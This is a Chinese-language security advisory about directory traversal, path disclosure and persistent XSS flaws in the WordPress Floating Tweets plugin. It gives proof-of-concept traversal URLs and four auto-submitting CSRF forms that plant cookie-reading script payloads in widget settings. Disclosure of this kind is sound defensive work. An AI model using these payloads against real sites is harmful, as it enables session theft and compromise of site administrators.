WordPress Floating Tweets插件目录遍历和HTML注入漏洞


发布日期:2013-01-12
更新日期:2013-01-16

受影响系统:
WordPress Floating Tweets
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57302
 
WordPress Floating Tweets 可快速添加浮动工具集,显示任一twitter源的最新tweet。
 
Floating Tweets 1.0.1及其他版本在实现上存在目录遍历和多个HTML注入漏洞,攻击者可利用这些漏洞访问服务器进程上下文内的任意文件,在受影响浏览器中执行HTML和脚本代码。
 
<*来源:MustLive (mustlive@websecurity.com.ua)
 
  链接:http://packetstormsecurity.com/files/119499/floatingtweets-xsstraversal.txt
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Full path disclosure (WASC-13):
 
http://site/wp-content/plugins/floating-tweets/dcwp_floating_tweets.php
 
http://site/wp-content/plugins/floating-tweets/dcwp_floating_tweets_widget.php
 
http://site/wp-content/plugins/floating-tweets/skin.php?skin=1
 
Directory Traversal (Windows) (WASC-33):
 
http://site/wp-content/plugins/floating-tweets/skin.php?widget_id=2&skin=1\1
 
DT allows to read only css-files (in folder /skins/ and subfolders). At
turned off mq it's possible to use Null Byte Injection, which allows via DT
to read arbitrary files.
 
XSS (persistent XSS) (WASC-08):
 
Three persistent XSS holes. For attack it's needed to bypass protection
against CSRF (parameter savewidgets). E.g. using reflected XSS.
 
Floating Tweets XSS.html
 
<body onLoad="document.hack.submit()">
 <form name="hack" action="http://site/wp-admin/admin-ajax.php"
method="post">
 <input type="hidden" name="widget-dc_jqfloatingtweets_widget[3][twitterUrl]"
value='" style="xss:expression(alert(document.cookie))'>
 <input type="hidden" name="widget-id" value="dc_jqfloatingtweets_widget-3">
 <input type="hidden" name="id_base" value="dc_jqfloatingtweets_widget">
 <input type="hidden" name="action" value="save-widget">
 <input type="hidden" name="savewidgets" value="e8af3131f4">
 <input type="hidden" name="sidebar" value="primary-widget-area">
 </form>
 </body>
 
Floating Tweets XSS-2.html
 
<body onLoad="document.hack.submit()">
 <form name="hack" action="http://site/wp-admin/admin-ajax.php"
method="post">
 <input type="hidden" name="widget-dc_jqfloatingtweets_widget[3][linkText]"
value='" style="xss:expression(alert(document.cookie))'>
 <input type="hidden" name="widget-id" value="dc_jqfloatingtweets_widget-3">
 <input type="hidden" name="id_base" value="dc_jqfloatingtweets_widget">
 <input type="hidden" name="action" value="save-widget">
 <input type="hidden" name="savewidgets" value="e8af3131f4">
 <input type="hidden" name="sidebar" value="primary-widget-area">
 </form>
 </body>
 
Floating Tweets XSS-3.html
 
<body onLoad="document.hack.submit()">
 <form name="hack" action="http://site/wp-admin/admin-ajax.php"
method="post">
 <input type="hidden" name="widget-dc_jqfloatingtweets_widget[3][tabText]"
value='" style="xss:expression(alert(document.cookie))'>
 <input type="hidden" name="widget-id" value="dc_jqfloatingtweets_widget-3">
 <input type="hidden" name="id_base" value="dc_jqfloatingtweets_widget">
 <input type="hidden" name="action" value="save-widget">
 <input type="hidden" name="savewidgets" value="e8af3131f4">
 <input type="hidden" name="sidebar" value="primary-widget-area">
 </form>
 </body>
 
Examples of attack for these three XSS on IE7 and previous versions. With
using of MouseOverJacking it's possible to attack any browsers. The code
will execute right away at sending request and further at visiting
http://site/wp-admin/widgets.php.
 
Floating Tweets XSS-4.html
 
<body onLoad="document.hack.submit()">
 <form name="hack" action="http://site/wp-admin/admin-ajax.php"
method="post">
 <input type="hidden" name="widget-dc_jqfloatingtweets_widget[3][tabText]"
value="'});alert(document.cookie);a({b:'">
 <input type="hidden" name="widget-id" value="dc_jqfloatingtweets_widget-3">
 <input type="hidden" name="id_base" value="dc_jqfloatingtweets_widget">
 <input type="hidden" name="action" value="save-widget">
 <input type="hidden" name="savewidgets" value="e8af3131f4">
 <input type="hidden" name="sidebar" value="primary-widget-area">
 </form>
 </body>

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
WordPress
 ---------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://wordpress.org/

相关内容